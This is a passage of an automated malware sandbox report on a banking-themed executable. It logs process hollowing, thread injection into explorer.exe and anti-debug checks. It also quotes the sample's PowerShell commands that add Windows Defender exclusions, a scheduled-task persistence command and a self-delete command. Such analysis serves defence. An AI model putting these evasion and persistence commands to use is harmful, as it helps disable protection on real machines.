          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0542849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0542EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0542FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05428794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0542766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0541C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05448E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0541E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05458EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0541C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0541B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05434120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05442990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_00409B30 LdrLoadDll
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: F60000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmpJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.412974599.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.408000852.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.433341392.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.396953851.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000003.535032917.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000003.538546418.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.608113159.0000000004E70000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.607889638.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.603883171.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.543133001.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.543696150.0000000004E70000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp | Binary or memory string: Program Manager (Not Responding)
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455383928.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.423622107.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.385587747.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.405655661.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.538571440.0000000000BAB000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.608113159.0000000004E70000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.538393765.0000000000B27000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.602763202.0000000000B27000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.603102128.0000000000BAB000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.603883171.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.543696150.0000000004E70000.00000004.00000001.sdmp | Binary or memory string: Progman
          Source: msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.603883171.0000000001380000.00000002.00020000.sdmp | Binary or memory string: |Program Manager
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
